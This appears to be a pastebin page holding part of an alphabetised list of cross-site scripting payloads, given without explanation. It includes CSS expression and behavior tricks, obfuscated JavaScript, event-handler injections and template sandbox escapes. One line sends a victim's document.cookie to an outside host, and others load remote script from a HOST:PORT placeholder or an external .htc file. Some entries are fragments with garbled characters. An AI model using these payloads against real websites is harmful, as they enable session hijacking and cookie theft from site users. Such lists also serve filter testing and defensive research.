- <;XSS STYLE=”;behavior: url(http://ha.ckers.org/xss.htc);";>;
- <XSS STYLE=”behavior: url(http://ha.ckers.org/xss.htc);">
- <XSS STYLE=”behavior: url(xss.htc);”>
- <~/XSS STYLE=xss:expression(alert(‘XSS’))>
- <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
- <;XSS STYLE=”;xss:expression(alert(‘;XSS’;))”;>;
- </XSS STYLE=xss:expression(alert(‘XSS’))>
- </XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
- <XSS STYLE=”xss:expression(alert(‘XSS’))”>
- <XSS STYLE=xss:e/**/xpression(alert(‘XSS’))>
- <XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
- XSS STYLE=xss:e/**/xpression(alert(‘XSS’))>
- XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
- <XSS STYLE=”xss:expression(document.vulnerable=true)”>
- <XSS STYLE=”xss:expression(javascript:alert(1))”>
- <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=”http://www.procheckup.com/?sid="%2bdocument.cookie)>
- <xss:xss>XSS</xss:xss>
- <xss:xss>XSS</xss:xss></HTML>”””,”XML namespace.”),(“””<XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:javascript:alert(1)”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <x style=”background:url(‘x;color:red;/*’)”>XXX</x>
- <x style=”background:url(‘x[a];color:red;/*’)”>XXX</x>
- <x style=”background:url(‘x ;color:red;/*’)”>XXX</x>
- <x style=”behavior:url(%(sct)s)”>
- <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
- x=this[x]
- x</title><img src%3dx onerror%3dalert(1)>
- x��</title><img src%3dx onerror%3dalert(1)>
- x=’\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
- x=x=>{}/alert(1)/+alert(2)
- <x xmlns=”http://www.w3.org/2001/xml-events" event=”load” observer=”foo” handler=”data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar”/>
- <x xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:actuate=”onLoad” xlink:href=”javascript:alert(1)” xlink:type=”simple”/>
- X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
- (X=_=>`(X=${X})()`)()
- XXX<style>*[‘<! — ‘]{}</style> →{}*{color:red}</style>
- x=x=>x=>x=>x=>x=>x=>x=>alert(1);x()()()()()()()()
- x(x(y))
- x(y)
- {{x = {‘y’:’’.constructor.prototype}; x[‘y’].charAt=[].join;$eval(‘x=alert(1)’);}}
- xyz onerror=alert(6);
- y=<a>alert</a>;content[y](123)
- y=’nam’+$$
- y=’na’+’me’
- y=name
- y=x(y)
- ‘“()=<z>
- z=d.createElement(“script”);
- z=d.createElement(“script”);z.src=”//HOST:PORT”;
- ZeroClipboard.swf?id=\”))} catch(e) {alert(1);}//&width=1000&height=1000
- z.src=”//HOST:PORT”;
Add Comment
Please, Sign In to add comment